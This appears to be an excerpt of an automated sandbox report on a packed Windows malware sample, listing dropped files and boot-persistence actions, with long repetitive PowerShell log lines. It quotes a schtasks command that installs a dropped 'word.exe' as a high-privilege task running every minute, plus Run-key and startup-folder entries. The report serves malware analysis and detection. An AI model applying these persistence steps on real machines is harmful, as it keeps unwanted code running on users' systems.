                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pydJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pydJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run word
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run word

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448776C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6448776C0
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
